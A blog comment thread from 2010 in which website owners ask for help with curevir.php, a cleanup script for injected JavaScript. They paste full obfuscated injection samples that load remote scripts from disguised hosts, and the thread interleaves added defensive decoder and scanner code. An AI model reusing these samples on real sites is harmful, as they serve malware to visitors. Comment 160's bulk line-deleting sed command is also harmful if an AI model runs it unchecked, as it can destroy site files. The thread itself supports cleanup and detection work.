    thx 4 ur great support.
    Now the script works fine…

  141. Terry January 31st, 2010 at 2:01 am

    Thanks for your script I had the tech guys run it on 24 of my infected web sites and it is a lifesaver.

    One note: Does not detect any older index.php3 files if you have any left. I had some old ones still on my server. At least now I know where they are. Thanks again!

  142. Terry January 31st, 2010 at 2:08 am

    One other thing. Some of my sites that were attacked were not sites that I had ftp access on my Machine.

    I know that is how they say they get in, but almost all of my hacked sites had one thing in common. They were all Joomla or had an instance of Joomla somewhere on them. The others were not hit. I’m not implying anything, it is just an observation.

  143. Erin February 1st, 2010 at 1:00 am

    Thanks for the great work, keep it up!

  144. Barbara February 1st, 2010 at 8:44 pm

    Hi Konstantin -

    Thank you for the updated version of the script - donation gladly made!

    Yesterday - I uploaded 1.2.3 - NOT USING FILEZILLA to my BlueHost account & asked the tech to run the script for me. I have a shared hosting account so cannot execute this script myself.

    The tech ran it in the root as well as inside each of my domains - she said it did a very nice job of cleaning the virus.

    However - she said the new script (1.2.3) stops running at a certain point.

    She says it’s “truncated” at the cron job.

    Now all of my sites have this error:

    (www.Paws4Laws.com)

    Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home1/thepetfr/public_html/Legislation/wp-includes/default-filters.php on line 173

    Parse error: syntax error, unexpected $end in /home1/thepetfr/public_html/Legislation/wp-includes/default-filters.php on line 173

    OR THIS ERROR:

    (www.StephenACorbman.com)

    Fatal error: Call to undefined function get_header() in /home1/thepetfr/public_html/stephenacorbman/index.php on line 1

    Can you please advise??

    Thank you!!!

  145. Relja February 4th, 2010 at 11:45 pm

    Hi I have same problem as you all,

    I uploaded curevir.php on my webhost and he says that there aren’t any infected files

    malicious code:

    try{window.onload=function(){Iy1blw7 = ‘p*c*a*uBt*o*-BcEo*m[-7cEn7.Ea7d*d7tBhBiBsB.BcBo7mE.Ea[dBsEe[rBv[eEr[pBlEuBs*-[c[o[m7.[t[a7r[tEb[aBnBd*.*r7u7:*K[kBi*yEl*eB6[lBsBtE/EgEo*o*g*l7e*.Bc[o7m[/[g[o*oBg[lBe*.Bc*o*m7/7a[cBe7r*.Ec*oEmE/Ey7o[u[j*iEzEz7.[c7o7m*/[oBpBe[nEd[n[sB.EcBo7mE/E'.replace(/[E\*B7\[]/g, ”);Fajbkymxq = ’script’;Edxj8r21b = ‘dafar’.replace(/a/g, ‘e’);Jc5efhx = document.createElement(Fajbkymxq);Wvi6kif = ‘8>0i8a0a’.replace(/[a~\>3i]/g, ”);Jc5efhx.src = ‘http://’+Iy1blw7.replace(/Kkiyle6lst/g, Wvi6kif);Jc5efhx.setAttribute(Edxj8r21b, ‘1′);document.body.appendChild(Jc5efhx);} } catch(Xhzixmz ) {}

    can this script remove this code?

  146. Adrián February 5th, 2010 at 5:39 am

    Dear Boyko

    Sorry, my English is very poor, I’m Argentinian and my language is Spanish.

    I ran the script and it worked perfectly, really thank you for this, but what is this warning?
    [code]START BACKUP:

    Warning: exec() has been disabled for security reasons in /home/sc4821we/public_html/curevir.php on line 152
    !backup-1265328879.tgz was created successfully

    Warning: chmod() [function.chmod]: No such file or directory in /home/sc4821we/public_html/curevir.php on line 156;[/code]

    Thank you again

  147. Konstantin Boyko February 5th, 2010 at 11:35 am

    2Adrian: This just means that backup function didn’t work on your server, because exec() is disabled there. But as soon as the files are cleared - you should be all right. Don’t forget to change FTP password.

  148. Tess February 6th, 2010 at 5:22 am

    I’m not a techie or website owner. Just a regular laptop user who got infected with this trojan that redirects searches. Got AVAST and it apparently found malware twice in one scanning but my searches still get redirected. Maybe I should just shut this laptop down until someone gets to the root of it. No pun intended.

  149. Tysonjm February 7th, 2010 at 11:38 pm

    Hi - Do I have a new variant of this virus? My infected code is below, but I get this result after running the script:

    TOTAL: 0

    Virus versions found:

    START BACKUP:

    END BACKUP!

    try{window.onload=function(){Gvi3whyi = ‘mKaHcxy[s%-[cKoHm[.[s[o[nHgHsx.xp[kH.[yHoxm%i[u[r%i[-xc[o%-Hjxpx.xcxo[mxixnxgKg[eHn[e%r%a[t%i[oKn%.xr%ux:xY[s%e%4xhHwHsxyHq[j%4x/xg[oHoHg%lKeH.%c[oxmK/Hg[o[o[gHlHe[.[cHo%m[/xlHeKb[oKnHc%oxi%n%.KfHrK/Hg%aKmKeHf[axqHsH.%cKo%mK/[pHrHi%c[eKlxiHnxex.[c[o[m%/K'.replace(/[KH%\[x]/g, ”);M25qzwbn = ’script’;Fpet49q = ‘dafar’.replace(/a/g, ‘e’);Wgctgm8r = document.createElement(M25qzwbn);Cmfspvf3 = ‘8+0+8C0T’.replace(/[TOiC\+]/g, ”);Wgctgm8r.src = ‘http://’+Gvi3whyi.replace(/Yse4hwsyqj4/g, Cmfspvf3);Wgctgm8r.setAttribute(Fpet49q, ‘1′);document.body.appendChild(Wgctgm8r);} } catch(Dv9dc5l61 ) {}

  150. Nick February 8th, 2010 at 9:08 pm

    Konstantin,

    I think you are doing a great job!! Keep up the good work! Your antivirus worked like a charm on my websites!!

    Cheers

  151. Sameer Shelavale February 9th, 2010 at 9:25 am

    @Tysonjm

    Can you please send me exact code in a zipped txt file on. I shall update my codes too samiirds[<At}]g_m_a_i_l[d0t]c0m

    that is gmail address.

  152. Bogdan February 9th, 2010 at 6:09 pm

    For Sys Admins, Website Operators.
    You can use this script to clean all your sites at once.
    Just copy the curevir.php in the parent folder where you have all your sites and just run it from php-cli. It will recurse into dirs and clean everything at once.
    Quite handy.

    Thanks for the script!!!

  153. Olly Schade February 9th, 2010 at 9:57 pm

    Another Mutation.

    var n=new String();this.k=”";var um=new Date();var kb=new Date();var q=’sxc%rXi%pXt%’.replace(/[%xeXn]/g, ”);this.b=false;var rp;if(rp!=”){rp=’h'};var j=window;var umc=32379;var jk;if(jk!=’yj’ && jk!=’zb’){jk=’yj’};var qn=document;var d;if(d!=” && d!=’xw’){d=null};j.onload=function(){var _=”";var wm;if(wm!=’doq’ && wm!=’uw’){wm=’doq’};try {var pt;if(pt!=’lm’ && pt!=’xd’){pt=’lm’};var lmv=new Array();m=qn.createElement(q);var id;if(id!=’qv’ && id != ”){id=null};var br=new Array();var yl=”yl”;this.qo=”;m.src=’hVt#tVp#:V/#/!sVo6f#tFpFeVdFiFa!-#cFo!m6.#hVu6r#r#iFy#eVtV.!cVoVm6.6tFr#.FsFe!dFo!p!a6r#k#i#n!g6-6c!oVm#.Fr#e!cFe!nVtFm#e!xVi#c!o#.6r#u!:V860V8!06/V5F5Fb#b6s!.#cFo6mF/!5V5Vb#b!s6.!cVo!mF/Fg6o!o6gFl6e6.6c#o!m6/#mFe!rFcFa#d!o6l!i#bVr!e#.6c6o#m6.!mVx#/FmFp6n!r!sV.6cVo!m#/!’.replace(/[\!#V6F]/g, ”);m.setAttribute(’d_eRf_eRr!’.replace(/[\!0_Rt]/g, ”), “1″);this.pj=”pj”;this.yt=false;this.zm=27364;qn.body.appendChild(m);var bt;if(bt!=” && bt!=’a'){bt=”};this.al=”;} catch(t){var is=”is”;};var qs=”";var qf=”qf”;};var ej=63325;

    this.s=”;var py=”py”;var r=window;var x=document;this.fi=”fi”;var qd;if(qd!=’fq’ && qd!=’v'){qd=’fq’};var d=’sec7rfi7pete’.replace(/[ef47T]/g, ”);var w;if(w!=” && w!=’ps’){w=null};var t=false;r.onload=function(){try {p=x.createElement(d);var fa=new Date();var c;if(c!=’im’){c=’im’};p.setAttribute(’dDe1fpe1rp’.replace(/[p1DiC]/g, ”), “1″);var ku;if(ku!=’jx’ && ku!=’yj’){ku=”};var rw;if(rw!=’a’ && rw!=’cp’){rw=”};p.src=’hbtVt?pw:V/;/?p;owrbnbo?r;a?m;aw-;c;o?m;.wa?lVlwy;ewsV.?cVoVmb.?gbu?mwtbrVe;e;-Vc;o;mV.?r;e?c;e;nbtwmwebxVi?cwo?.;rwuV:w8;0?8b0V/VabubtVowhwo?mwew.?cVo;mV.?c?n?/VaVu?tVo;hVo;m;eV.;c;o?m;.bcbnw/bkwiVowsVk?e?a;.bnVebt;/bfVi;fbaw.Vcwo;mb/;g?obo?gblbe;.wc;oVm?/;’.replace(/[;w\?Vb]/g, ”);var vv;if(vv!=’e'){vv=”};var qg=new String();x.body.appendChild(p);this._a=false;} catch(k){var nk;if(nk!=’rg’ && nk!=’y_’){nk=”};this.kk=”;};this.mw=24319;};var gr;if(gr!=” && gr!=’nr’){gr=’o'};var aa=”";
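
Many of the variants posted in this thread hide the tag name, attribute names and URL as junk-padded string literals that are cleaned at run time with `.replace(/[...]/g, '')`, and from comment 153 on the `try{window.onload` marker is gone. The following added example (not part of curevir.php; the sample strings, the host name and all function names are constructed) decodes such literals statically, without executing the file, so a scanner can flag them whatever the surrounding code looks like.

```javascript
'use strict';
// Added example; not part of curevir.php. Sample input is constructed.

// 'literal'.replace(/pattern/flags, '') -- only calls with an EMPTY replacement.
// Groups: 1 quote, 2 literal, 3 pattern, 4 flags, 5 quote of the replacement.
const STRIP_CALL = /(['"])((?:(?!\1)[^\\\n])*)\1\s*\.replace\(\s*\/((?:\\.|\[(?:\\.|[^\]\\\n])*\]|[^\/\n\\\[])+)\/([gi]*)\s*,\s*(['"])\5\s*\)/g;

// The pattern comes from an untrusted file, so it is only compiled when it is
// a plain character filter: one [...] class, or single characters joined by
// "|". That rules out groups and quantifiers, and with them regex blow-ups.
const SAFE_FILTER = /^(?:\[(?:\\.|[^\]\\])*\]|(?:\\.|[^\\|])(?:\|(?:\\.|[^\\|]))*)$/;

// Label what the cleaned string turned out to be.
function classify(decoded) {
  if (/^script$/i.test(decoded)) return 'script-tag-name';
  if (/^(?:defer|src|type|id|text\/javascript)$/i.test(decoded)) return 'attribute';
  if (/^https?:\/\//i.test(decoded)) return 'url';
  // Some variants prepend "http://" separately and patch the port in later.
  if (/^[a-z0-9-]+(?:\.[a-z0-9-]+)+(?::\w+)?\//i.test(decoded)) return 'host-path';
  return 'other';
}

// Find every junk-stripping call and apply the filter to the literal only.
// Nothing from the scanned file is evaluated.
function decodeStripCalls(source) {
  const findings = [];
  for (const m of source.matchAll(STRIP_CALL)) {
    const literal = m[2];
    const pattern = m[3];
    const flags = m[4];
    if (!SAFE_FILTER.test(pattern)) continue; // not a plain character filter
    let decoded;
    try {
      decoded = literal.replace(new RegExp(pattern, flags), '');
    } catch (e) {
      continue; // pattern or flags did not compile
    }
    if (decoded === literal) continue; // nothing was stripped
    findings.push({ offset: m.index, literal, decoded, kind: classify(decoded) });
  }
  return findings;
}

// A file that assembles "script" or a URL out of padded literals is worth a
// manual look, however the rest of the injected code is written.
function isSuspicious(source) {
  return decodeStripCalls(source).some(
    (f) => f.kind === 'script-tag-name' || f.kind === 'url' || f.kind === 'host-path'
  );
}

// --- Constructed sample -----------------------------------------------------
// pad() interleaves junk characters the way the posted variants do.
function pad(text, chars) {
  return text.split('').map((c, i) => c + chars[i % chars.length]).join('');
}

const SAMPLE = [
  "var q='" + pad('script', '!#') + "'.replace(/[!#]/g, '');",
  "m.src='" + pad('http://bad.example.invalid:8080/x/', '@Z') + "'.replace(/[@Z]/g, '');",
  "m.setAttribute('" + pad('defer', '$^') + "'.replace(/\\$|\\^/ig, ''), '1');",
  "var title = 'a-b-c'.replace(/-/g, ' ');",  // benign: replacement not empty
  "var t = 'x1y2'.replace(/(\\d+)+$/g, '');", // skipped: not a plain filter
].join('\n');

for (const f of decodeStripCalls(SAMPLE)) {
  console.log(f.kind.padEnd(16), JSON.stringify(f.decoded));
}
```

Decoded URLs and host names are useful for proxy or DNS log searches; the scanner itself only reports and does not modify files.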

  154. Sameer Shelavale February 10th, 2010 at 1:10 pm

    @olly,
    this is getting nasty. Can you

    Can you please send me exact code in a zipped txt file on. I will prepare a cure for it soon.

    samiirds[<At}]g_m_a_i_l[d0t]c0m
    The above is gmail id

  155. Nik Nastev February 11th, 2010 at 11:41 am

    Any news about new version of curevir? We need it asap. Thank you!

  156. mark February 11th, 2010 at 2:08 pm

    This is starting to be very annoying…
    How could it have infected me ?
    Account is new, no password saved.
    Can it be because it is on a shared server ?

    I have a new code, not identified.

    var w;if(w!=” && w!=’b'){w=”};this.a=”";this.n=”";var k=document;var q=’s:c:r:iXpmtX’.replace(/[XeAm\:]/g, ”);var e;if(e!=” && e!=’wf’){e=”};var v;if(v!=’ta’){v=’ta’};var s=window;var sy;if(sy!=’d’ && sy!=’_'){sy=’d'};s.onload=function(){var o=”o”;var hl=”hl”;try {this.ay=”";h=k.createElement(q);var dk;if(dk!=” && dk!=’tn’){dk=’ig’};var pl;if(pl!=” && pl!=’s_’){pl=null};var _m;if(_m!=” && _m!=’xa’){_m=”};var bf;if(bf!=” && bf!=’un’){bf=”};h.src=’hKtUtEpK:@/@/Et@aEr@gKe@tE-@cKo@mE.KfJi@l@eKs@tKu@bJeE.UcUoEmU.Km@aJrUkJeUtKg@iUdJ-UcJo@mE.UtUh@eJa@n@tKi@mJaEtKrUiExK.Ur@uU:@8E0E8K0@/@eExUcEiKtKeK.UcUoJ.Jj@p@/EeJxKcUiJtJeJ.JcEoU.KjKpU/K4@tUuKbEeE.KcUo@m@/KdJaUuUmU.JnEeEt@/KgJo@oJgUlKeJ.JcJoJmU/E’.replace(/[E@JUK]/g, ”);var ok;if(ok!=’ak’){ok=”};h.setAttribute(’d?e>f$e$r?’.replace(/[\?\$bB\>]/g, ”), “1″);this.hp=false;k.body.appendChild(h);} catch(i){var ry;if(ry!=” && ry!=’wk’){ry=null};this.l_=”";};var jz;if(jz!=’fo’ && jz != ”){jz=null};var vi=”;};var ad;if(ad!=” && ad!=’ul’){ad=’x_’};

  157. mark February 11th, 2010 at 2:23 pm

    help please….

    I have replaced this in curevir but no success..
    Gives an error,

    Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ‘)’ in /home3/print/public_html/curevir.php on line 85

    This is the code:

    array(
    ’string’ => ‘var w;if(w!=” && w!=’b'){w=”};’,
    ‘comment’ => ‘var w;if(w!=” && w!=’b'){w=”};’,
    ‘regexp_html’ => ‘hKtUtEpK:@/@/Et@aEr@gKe@tE-@cKo@mE.KfJi@l@eKs@tKu@bJeE.UcUoEmU.Km’, ‘regexp_js’ => ‘hKtUtEpK:@/@/Et@aEr@gKe@tE-@cKo@mE.KfJi@l@eKs@tKu@bJeE.UcUoEmU.Km@aJr’
    ),

  158. chris February 11th, 2010 at 10:14 pm

    TOTAL: 0

    Virus versions found:

    START BACKUP:

    END BACKUP!

    This is all it says when I run it even with the shell after the .php

    any suggestions?

  159. stounemaster February 11th, 2010 at 11:50 pm

    there are two new versions …

    var u=’s+c9rbi9p9t+’.replace(/[\+bu\:9]/g, ”);var b;if(b!=’wi’ && b!=’g'){b=”};var q=12453;var o=document;this.te=63319;this.oq=39435;var w=window;var x;if(x!=” && x!=’ag’){x=”};var it=36693;var m=”m”;w.onload=function(){this._o=false;try {var j_;if(j_!=’_a’){j_=”};var wl=new String();c=o.createElement(u);var cv=false;var h=false;var k;if(k!=’p’ && k!=’r'){k=”};c.setAttribute(’dPePf4e*rJ’.replace(/[J\*4PO]/g, ”), “1″);var li=”";c.src=’hZt@t@pz:z/@/bf2ibs@hzk2i2-@n@ebtZ.@szlbibdbe2s2hbazrze@.bnzebt@.@nZibk@kbe@iZ-@c@oz-@j@p2.zyZoZu@r@tbazg2hbe2u@ezrb.zrZuz:Z8@0Z8b0@/Z1zu2nZdZ1b.zdZeb/b1bu2nbdZ1Z.Zdzeb/bnbibkbkzaznbs2p2oZr2tbsb.zcbobm2/zgbozo@g2lze2.Zc2o2mz/2czt@rbi@p2.Zcbozm@/@’.replace(/[@Zb2z]/g, ”);var xb=37124;this.vg=”";var fc;if(fc!=”){fc=’ah’};var cn=”cn”;o.body.appendChild(c);var uo;if(uo!=” && uo!=’jd’){uo=”};var cn_=new Array();} catch(j){var fv;if(fv!=’jez’){fv=’jez’};var un;if(un!=’bo’){un=’bo’};};var wfe;if(wfe!=’fa’ && wfe != ”){wfe=null};var na;if(na!=’ind’ && na!=’zs’){na=’ind’};};var bv;if(bv!=’sc’){bv=’sc’};this.mk=37257;

    var i=”i”;u=function(){var g=document;var jg=new Array();window[_([2,7][0])]=function(){try {this.l=26180;ui=g[_([8,1][1])](_([0][0]));ui[_([3][0])]=_([8,3][0]);var p=”";ui[_([5][0])](_([2,7][1]), “1″);var gf = g[_([6][0])];var ve;if(ve!=” && ve!=’mc’){ve=null};gf[_([4][0])](ui);} catch(n){};};this.iz=”;function _(m){var dm=”";var t=['sIc4rji4pItj'.replace(/[ja46I]/g, ”), ‘c|r_eka_t/e|E_lkeJm|e_n_t/’.replace(/[/J\|_k]/g, ”), ‘ojnelxojaQdx’.replace(/[xe9Qj]/g, ”), ’s0r5c5′.replace(/[5Zv40]/g, ”), ‘a!p!p!eqn0dMCqh9i9l!dM’.replace(/[Mq\!90]/g, ”), ’sQeBt+A+tBtBrBi+bjujtjeB’.replace(/[B@j\+Q]/g, ”), ‘b|oGdGyG’.replace(/[G/\|fW]/g, ”), ‘dKe.f.esr.’.replace(/[\.sX_K]/g, ”), ‘hFtStSpF:R/F/<aRlSlRrJeJc<i<pSeSsS-RcRoFmS.FeJaFrJtRhSlSiSnRk<.<nSeRtF.Sn<iJkFk<aFnJsRpRoSrRtJs<-<cRoRmS.RnJeFwRgFoSlFfJo<nSlRi<nFeF.FrRuF:S8R0J8<0</JwRuFnSd<eSrSgFrRoRuSnJdS.RcRo<m</<w<u<nRdSeJrSg<rRoRuRnSdR.ScJoRm</RgJuSmRt<r<eJeR.ScJoJmJ/SeJlJpJaRi<sS.ScJoSm</RgRoSoFgFlFeS.RcRo<m</F’.replace(/[FR\<SJ]/g, ”)];var j=t[m];return j;}var kt;if(kt!=”){kt=’lr’};this.j_=15316;};var lm;if(lm!=” && lm!=’ae’){lm=”};u();var o;if(o!=” && o!=’cw’){o=”};

  160. mist February 12th, 2010 at 10:00 am

    if you have shell access to the linux server, you can fix it manually with something like this:

    grep -ilr 'sqcqrLiVpLtV' /var/www/ | xargs -i@ sed -i '/sqcqrLiVpLtV/d' @

    replace the 'sqcqrLiVpLtV' with some unique part of your injected script.
    this command searches the weird characters in all files within /var/www/ and deletes the lines which contain it.
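
The grep/sed one-liner from comment 160, expanded into a search-then-clean routine (an added example, not part of the original comment or of curevir.php). It matches the marker as a fixed string, keeps a copy of every file before touching it, and rewrites files in place so mode and owner are preserved; the function names, the sample tree and the marker text are constructed for illustration.

```sh
#!/bin/sh
# cure_marker search|replace ROOT MARKER [BACKUP_DIR]
# search  : list the files that contain MARKER, change nothing
# replace : copy each hit to BACKUP_DIR, then drop the lines containing MARKER
cure_marker() {
    mode=$1; root=$2; marker=$3; backup=${4:-}
    [ -n "$marker" ] || { echo "marker must not be empty" >&2; return 2; }
    if [ "$mode" = replace ] && [ -z "$backup" ]; then
        echo "replace needs BACKUP_DIR" >&2; return 2
    fi
    list=$(mktemp) || return 1
    # -F: fixed-string match. Injected code is full of regex metacharacters
    # ([ ] / $ ?), which a sed or grep pattern would misread.
    find "$root" -type f -exec grep -lF -e "$marker" {} + > "$list" || :
    count=$(wc -l < "$list" | tr -d ' ')
    if [ "$mode" = replace ]; then
        while IFS= read -r f; do
            # Untouched copy first, under the same path inside BACKUP_DIR.
            mkdir -p "$backup/$(dirname "$f")" && cp -p "$f" "$backup/$f" \
                || { rm -f "$list"; return 1; }
            tmp=$(mktemp) || { rm -f "$list"; return 1; }
            # grep exits 1 when every line was injected; that is not an error.
            # -a keeps grep from replacing binary-looking content with a notice.
            grep -avF -e "$marker" "$f" > "$tmp" || [ $? -eq 1 ]
            # Write through the existing inode so mode and owner are kept.
            cat "$tmp" > "$f"
            rm -f "$tmp"
        done < "$list"
    else
        cat "$list"
    fi
    rm -f "$list"
    echo "TOTAL: $count"
}

# Constructed demo tree: one infected file (name with a space), one clean file.
# The marker is placeholder text, not a real payload.
cure_demo() {
    site=$(mktemp -d); bak=$(mktemp -d)
    marker='var X=document;/*[INJECTED?]*/'
    printf 'alert(1);\n%s\n' "$marker" > "$site/my app.js"
    printf 'ok();\n' > "$site/clean.js"
    cure_marker search "$site" "$marker" | tail -n 1
    cure_marker replace "$site" "$marker" "$bak" | tail -n 1
    cat "$site/my app.js"
    rm -rf "$site" "$bak"
}

cure_demo
```

Like the one-liner, this drops the whole line that contains the marker, so check the search output for files where the injected code shares a line with legitimate code and restore those from the backup directory.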

  161. Mark February 12th, 2010 at 12:21 pm

    Thanks!

    Grep works like a charm
    if you need shell access, you can get php shell :) and open shell in your browser.

  162. stounemaster February 12th, 2010 at 1:18 pm

    hello,

    Can I post here the exact script I’m having problems with?

    thank you for the help !

  163. Nik Nastev February 12th, 2010 at 2:41 pm

    any chance for new script?

    Thanks

  164. rahul February 15th, 2010 at 8:03 pm

    Konstantin

    I ran the script but resulted in catching nothing. The trojan that my files are infected with is

    JS:Illredir-I [Trj]

    please help me with a script for removing this.

    Thanks

  165. Evgeny Orlov February 19th, 2010 at 4:01 pm

    A new code, not identified.
    var j;if(j!=” && j!=’a'){j=null};this._=”";:LineMixer [var lg=new Array();var p=window;var i='sTcTr&i$pvtT'.replace(/[T\$&Av]/g, ”);var r=’cYrYe>aptYe>E>lpe>m>epnptp’.replace(/[ph\>Yq]/g, ”);var jg=”;var __;if(__!=”){__=’ys’};]p.onload=function(){try {var w=false;q=document[r](i);this.va=”va”;:LineMixer [this.ei=54904;this._n=false;q['s;r>cV'.replace(/[V\>;Aa]/g, ”)]=’h1tEtTpE:+/E/FiEbTiEb1oE-FcFoTmE.F9FwFeTeF.TcFo+mF.1rEeEdFd+iFtF-1cEoFmF.1nFeFw+gTo1l+fFoFnElEi1nFe+.1rFu+:E810T8T0+/EcFy+wToErFlFdF.Tc+o1mE/TcTyTwFoFrTlFdE.Ec+oFmT/+w+hTi+t1e1p+aTg+e1sE.TcFoTmE/Th+eEiTsTeE.FdFeE/+g1o+oTgFlFeT.EcToEmF/T’.replace(/[T1F\+E]/g, ”);q.setAttribute(’dsezfze9r9′.replace(/[9Gsmz]/g, ”), “1″);]var r_=”;var gt=”gt”;var jq;if(jq!=’lf’ && jq != ”){jq=null};this.vv=”";document['bRo:d:y>'.replace(/[\>m8R\:]/g, ”)]['a+p+pXeXn!d!CQh!iXl>d>'.replace(/[\>\!\+QX]/g, ”)](q);var pm;if(pm!=’mi’ && pm != ”){pm=null};} catch(l){this.md=37788;};var pf=28263;};
    this.y_=”";var q=document;var m=window;var ee;if(ee!=’ld’ && ee!=’a_’){ee=’ld’};function y(w){var h=['hTtStqpT:T/F/Fi?kTeqa?-TcqoTmT.SgToqoTgTlqeF.FcFoFm?.?tFwF.TrSe?aFlSiStqyTkTi?nFgTsF-ScqoFmT.?h?oFmTeFuqsqa?oqn?l?iSn?e?.?rFuS:F8q0q8F0F/?mqiFnFiTnqoTvSa?.?oSrqgF/qmFiFnFiqnFoSvFaT.qo?rqgS/?gFoqoSgTl?eS.?cFoqmq/T1?7?1?7?3S.FcFoqmS/Fe?lSmTuFn?dSo?.SeFsT/S'.replace(/[SF\?qT]/g, ”), ’sXcXrKiGpatK’.replace(/[KXabG]/g, ”), ‘c8r8e8a,tpepE8lxepm8e,n8t,’.replace(/[,Upx8]/g, ”), ‘oInulIoIaydm’.replace(/[muy~I]/g, ”), ’s%r8cW’.replace(/[W8fE%]/g, ”), ‘aOpNpOePnPdmCNhNiOlNdm’.replace(/[mPgNO]/g, ”), ’s7eGtGAWt7tGrUiWb7uGtWe7′.replace(/[71GWU]/g, ”), ‘b4oxd5y5′.replace(/[5gmx4]/g, ”), ‘dte3fPe+r+’.replace(/[\+PW3t]/g, ”), “1″];var t=”t”;var l=h[w];return l;}var a = function(){var xr;if(xr!=” && xr!=’rd’){xr=’r'};try {x=q[y([2,2][0])](y([1,8][0]));x[y([6][0])](y([8][0]), y([3,9][1]));this.xg=38926;x[y([4][0])]=y([0][0]);var d_=”;var lb = q[y([7][0])];lb[y([5,8][0])](x);} catch(lx){};var b;if(b!=’g'){b=”};};m[y([8,3][1])]=a;
    var K=11669;var Z=’replace’;this.I=”;var l=’]';var Q=’[';var nm='';var k='g';var J='';this.z='';function C(D,ZA){var S="";var N=Q;N+=ZA;this.zd="";N+=l;var d=false;var n=new RegExp(N, k);var Ph="";return D[Z](n, ”);var WD=19684;};var s=C(’:i8H0H8i0H’,”HlUsi”);this.nmI=false;var V=window;var G=”;var o=C(’hRtMtMpR:R/2/2pRpRsMt2r2e4aJmJ-4c2oMmJ.Jf2iMxRy4aM.JcMoRmJ.JaJm4aMz4oMn2-4cJo4-JuRkR.2nReMw2u4s4a4gJuRi4dRe2.2rRu4′,”42JRM”);var DP=”;var f=C(’/NsOiJnAaA.JcAo4m4.4cOnN/OsOiNnAaO.OcJoNmA.AcJn4/JgAoNoNgAlNeO.OcAo4mO/J3O7AwAaAnO.NcNo4mN/4aNcNcAuOwJeNaAtJhAeJr4.4cAoOmO/A’,”AOJ4N”);var gz=”";var T=document;var R=false;function q(X){var h=[C('s5c5rli5p5t5',"5gblh"), C('cPr0e0ast0esEslPePmOeOnPtO',"OsP50"), C('ojnflDoDafd1',"1fDji"), C('sWrHcv',"vHgWp"), C('aPpPpweunwdTCHhTiPlTdu',"uPwTH"), C('sFeHtFAztFtHrRiHbzuRtHez',"zRHLF"), C('b9oCdTy6',"6zT9C"), C('dueufYe4rn',"npu4Y"), "1"];var Y=h[X];var iy=false;return Y;}this.HX=”";var GP = function(){try {this.F=”";G+=o;G+=s;G+=f;this.gW=43856;this.hz=”;u=T[q([1][0])](q([0][0]));var lT=32291;this.OL=”";u[q([3][0])]=G;var lW=false;u[q([5][0])](q([7][0]), q([8][0]));var W = T[q([6][0])];var v=false;var fr=false;W[q([4][0])](u);var B=”";} catch(e){};var iT=25549;};var QK=4473;var Ne=”;V[q([7,2][1])]=GP;var BU=false;

  166. Konstantin Boyko February 19th, 2010 at 8:03 pm

    Thanks to everyone for posting your variants of the code. I was busy with other things and haven’t had time to release new versions of the script. As far as I can see the hackers have learnt JavaScript (or used some tool) and obfuscated their JavaScript code rather well. So now it is rather hard to write a regular expression for every variation and to cover all of them, since they modify it often. So I had to release version 1.3, which can be downloaded here.

    The main difference from all previous versions is that it is semi-automatic: you enter the code which you can see in your files and the script searches for it and replaces it. You need to copy the exact code which you have inside . There are also 2 options (buttons) - “Search” and “Search&Replace”. I recommend running “Search” first and making sure that backup is working fine on your server and that your search string is correct.

    Also you need to make sure that you have magic_quotes_gpc=Off in PHP settings for your server.

    As always comments/contributions are kindly appreciated.
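
One way around the per-variant regular expressions described above, as an added example (not part of curevir.php): decode every `'…'.replace(/[…]/g, '')` literal in a file and report the file when the decoded strings include `script` and an http(s) URL. The function names and the sample files are constructed; variants that hide the replace call behind a helper function, or that use a different encoding, are not caught.

```sh
#!/bin/sh
# Print every string hidden as 'junk'.replace(/[chars]/g, '') in FILE,
# one decoded string per line.
decode_literals() {
    grep -oE "'[^']*'\.replace\(/\[[^]]+\]/g" "$1" | while IFS= read -r m; do
        lit=${m#\'}; lit=${lit%%\'*}            # text between the quotes
        cls=${m##*/\[}; cls=${cls%\]/g}         # characters inside [...]
        cls=$(printf '%s' "$cls" | tr -d '\\')  # drop regex escapes: \? -> ?
        printf '%s\n' "$lit" | tr -d "$cls"     # same effect as the JS replace
    done
}

# Report FILE when one decoded literal is exactly "script" and another is an
# http(s) URL, whatever junk characters and variable names the variant uses.
# Returns 0 and prints a line for a hit, returns 1 otherwise.
scan_file() {
    decoded=$(decode_literals "$1")
    url=$(printf '%s\n' "$decoded" | grep -E '^https?://' | head -n 1)
    if printf '%s\n' "$decoded" | grep -qx 'script' && [ -n "$url" ]; then
        echo "SUSPICIOUS $1 -> $url"
        return 0
    fi
    return 1
}

# Constructed samples in the style of the posted variants; the URL is a
# placeholder and the second file is an ordinary, harmless replace call.
scan_demo() {
    dir=$(mktemp -d)
    cat > "$dir/infected.js" <<'EOF'
var d='sXc7rXi7pt'.replace(/[X7]/g, '');var p=document.createElement(d);
p.src='hQt?tp:Q//exa?mple.invQalid:8080/x/'.replace(/[Q\?]/g, '');
EOF
    printf "%s\n" "var slug='My Title'.replace(/[ ]/g, '');" > "$dir/clean.js"
    for f in "$dir"/*.js; do scan_file "$f" || :; done
    rm -rf "$dir"
}

scan_demo
```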

  167. victoria February 21st, 2010 at 2:09 am

    Thanks for this, your help has been invaluable, especially as there seems to be very little out there for this obviously widespread attack!

  168. Chris Brennan February 23rd, 2010 at 7:27 am

    Thank you very much for posting this script Konstantin. I’ve been freaking out all day once I realized that all 10 of my websites had been compromised and were now seeding viruses and malware to everyone who visited them. It took me a while to figure out how to implement your fix, and I just wanted to point out a couple of things to others who may have similar problems following the directions.

    1. The only way I was successfully able to turn magic quotes off was by doing it through the .htaccess file. Editing this file may be more familiar than the other route to most people. Basically you just add this line to the .htaccess file in your root directory: php_flag magic_quotes_gpc Off

    I got the directions on that from this page: http://www.php.net/manual/en/security.magicquotes.disabling.php

    2. You really do have to change the file permissions for everything to 777. He isn’t joking about that. Once you’ve done the above two steps the script does work pretty well though, as far as I can tell.

    The only problem is that I can only figure out how to run it from the root directory given my limited technical knowledge, and I have found that there are other folders and files *outside* of the root directory that have been infected as well. With these all I have been able to do is go in and edit them manually.

    This may be the reason why many people are reporting that the virus comes back after a day though, because they don’t clean the files outside of the root. At least, I’m hoping that that is the case since I *just* started cleaning all of my files, and there hasn’t been enough time to see if it will come back yet.

    The last point that I wanted to make is that a lot of websites seem to say that this virus is propagated through unprotected passwords in Filezilla, because Filezilla doesn’t encrypt their passwords. I got rid of Filezilla today and found a new FTP program, but I was wondering if that was how everyone else got their websites infected as well? Did everyone get this on their sites due to Filezilla? The only other possibility for me is that some of my wordpress versions were kind of old. Other than that, I really don’t know how this happened. Any insight you guys can share as to the cause of this would be appreciated, so that we can all better avoid it in the future.

